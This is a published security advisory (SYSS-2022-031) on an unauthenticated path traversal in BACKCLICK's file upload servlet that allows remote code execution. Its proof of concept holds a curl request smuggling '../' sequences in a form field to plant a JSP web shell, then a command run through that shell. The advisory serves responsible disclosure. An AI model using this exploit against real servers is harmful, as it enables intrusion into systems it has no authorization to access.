-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-031 Product: BACKCLICK Manufacturer: BACKCLICK GmbH Tested Version(s): BACKCLICK Professional 5.9.63 (On-Premises) Vulnerability Type: CWE-23: Relative Path Traversal Risk Level: High Solution Status: Unknown Manufacturer Notification: 2022-05-25 Public Disclosure: 2022-11-14 CVE Reference: CVE-2022-44006 Author of Advisory: Moritz Bechler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: BACKCLICK is a web application used for e-mail marketing and the creation of newsletters. The German manufacturer describes the product as follows (see [1]): "BACKCLICK ist eine webbasierte Enterprise E-Mail Marketing Lösung und Newsletter Software, mit der Sie online E-Mail Kampagnen und Newsletter erstellen und an Ihre Kunden versenden können." Due to improper validation or sanitization of upload file names, an externally reachable, unauthenticated update function permits writing files outside the intended target location. Achieving remote code execution is possible, e.g. by uploading a web shell. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The servlet at /bc/servlet/gui.FileUpload accepts HTML form file uploads. This function can be accessed on the external web server and does not require authentication (which also has further security implications). The file name submitted through the "name" parameter is used without proper validation or sanitization to construct the target file path on the server. By supplying a path containing /../ components to change to the parent directory, the intended target directory can be escaped. This allows writing arbitrary files to a location the application server has file system permissions to. This can, for example, be used to write a JSP web shell to the /assets/ directory which is externally accessible, and a JSP file there will be interpreted by the servlet container. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): A simple JSP web shell can be uploaded, for example, using curl: - ----- $ curl -i -s -k -H \ $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyHghZhtH1FLC5fFd' \ --data-binary $'------WebKitFormBoundaryyHghZhtH1FLC5fFd Content-Disposition: form-data; name=\"name\" ../../../../../../../var/lib/tomcat9/webapps/bc/assets/foo.jsp - ------WebKitFormBoundaryyHghZhtH1FLC5fFd Content-Disposition: form-data; name=\"uploadedfile\"; filename=\"hello.o\" Content-Type: application/octect-stream <%@ page import=\"java.util.*,java.io.*\"%>

<%
if (request.getParameter(\"c\") != null) {
        Process p = [....]
}
%>
}

\x0d\x0a - ------WebKitFormBoundaryyHghZhtH1FLC5fFd--\x0d\x0a' \ $'https://externalhost/bc/servlet/gui.FileUpload?mid=0' HTTP/1.1 200 200 Date: Mon, 21 Mar 2022 12:57:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 54 Content-Type: application/json {"jsonrpc" : "2.0", "result" : "success", "id" : "id"} - ----- Then the web shell can be used to execute arbitrary system commands as the Tomcat user: - ----- $ curl -k -i https://externalhost/bc/assets/foo.jsp?cmd=whoami HTTP/1.1 200 200 Date: Mon, 21 Mar 2022 13:00:01 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: JSESSIONID=F63AA2F3A546DE04073190E78F23D5E2; Path=/bc; Secure; HttpOnly Content-Length: 198 Vary: Accept-Encoding Content-Type: text/html;charset=ISO-8859-1

Command: whoami

tomcat

- ----- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Contact vendor for solution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-05-25: Vulnerabilities reported to manufacturer 2022-06-28: Advisories provided again, as originals were not received 2022-07-20: Confirmation, inquiry regarding reproduction of one issue 2022-11-14: No more information received, public disclosure of vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for BACKCLICK https://www.backclick.de/ [2] SySS Security Advisory SYSS-2022-031 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-031.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Bechler of SySS GmbH. E-Mail: moritz.bechler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc Key ID: 0x768EFE2BB3E53DDA Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT4ACgkQdo7+K7Pl PdpoAAgArm/KWF1ajtO8UKjX1pD2aJ1+I+r0kse9VIOOKdgjfXfdiH2JHUyWsQO0 ARjDIJgrzbV0zeHG7Perr76G0uPH6YmDqc1IsG1kDCtJ0unD/MCUJVO3jpEfBNkQ DA3YnkY/MuGXlQ8DqySrHOxq8YtBi0Fyi9kVPx4rQ0tB8XyKp+B7wS8iL6UR9Hw2 604dK5VQNR4qrlDcvhPXw+O2/KJ1a2onnATKNEwlZE3fx+OJTRjMbZXSDBUWeVWg rb9KjCkFORBd0jhzyhdDs8ULpI8eIIUw+UqmV65XRjQu23sAV8oFAcn6n3xTlxBL w09jGpNA/9j8QLb8hyCBrd1QPLiGkw== =Xng3 -----END PGP SIGNATURE-----